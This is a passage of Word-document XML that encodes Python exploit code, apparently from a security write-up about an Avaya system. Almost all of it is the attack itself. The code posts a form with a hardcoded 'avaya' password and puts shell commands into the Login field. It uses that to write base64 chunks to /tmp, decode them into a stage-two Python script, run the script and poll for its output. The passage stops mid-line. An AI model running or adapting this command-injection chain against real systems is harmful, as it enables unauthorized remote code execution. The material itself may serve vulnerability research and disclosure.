          <w:p w14:paraId="5FB3A540" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09D77FD7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>data_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B500AB0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "Password": "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B6C287" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "https://127.0.0.1",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56517E8C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "5",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F70A1F8" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "Model": "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AARAnalysis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F026A27" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "Op": "list",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AAF49D0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41AF7CEA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "Qualifier": "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0457FA5F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "Fields": "*",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E2CCE6D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "0",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F8031D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "0",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609C4F5E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>saw_form_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679DAF33" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>saw_form_next</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "submit",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27572081" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>submitRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "Submit Request",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5486BAB2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>": "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB52398" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73234B64" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C103EFB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>for chunk in chunks:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="064CDC35" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    i += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DA8997F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58157879" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>data_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4ABBA3E8" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B8BCEFB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    if i == 1:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D902289" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        data["Login"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>template.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("echo " + chunk + " &gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/stage0")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D89DA2D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C83EC95" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        data["Login"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>template.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("echo " + chunk + " &gt;&gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/stage0")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C17C9E6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17A9581F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Uploading Stage 2 Chunk {0}...".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56A64F63" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="454076A9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5515083C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="22E9D3A5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>upload_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, data=data, verify=False, timeout=5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F691F5A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE4CBA8" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    except </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.exceptions</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.ReadTimeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A65F7ED" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E4F75F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EF2BACB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Reconstituting Stage 2...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F5024B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1265DD87" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>data_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="68F03532" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data["Login"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>template.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("base64 -d /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/stage0 &gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/stage2.py")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62359EFF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E2182B1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="269F82EA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>upload_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, data=data, verify=False, timeout=5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506E10D7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">except </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.exceptions</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.ReadTimeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2988ED09" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04FA3F73" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F60D5B4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Executing Stage 2...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F31357" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5839A5E1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>data_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="369D8833" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data["Login"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>template.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547ECFBD" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/bin/python /tmp/stage2.py &gt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/results.txt"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FF45CE1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C9BE7B2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04148E34" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A02228" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>upload_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, data=data, verify=False, timeout=5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514B1406" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">except </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.exceptions</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.ReadTimeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484C0C8F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="288AB6BF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C918D55" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Reading Results...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E7EED1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AC181FF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>text = ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA4E4B5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>current_lines</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE6E220" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="007DAE76" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>while "Done." not in text:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="709A8742" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7343D720" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>result_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, verify=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA0DE70" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12823340" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.status</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F4D972" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            text = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>r.text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7746B0EB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            lines = </w:t>
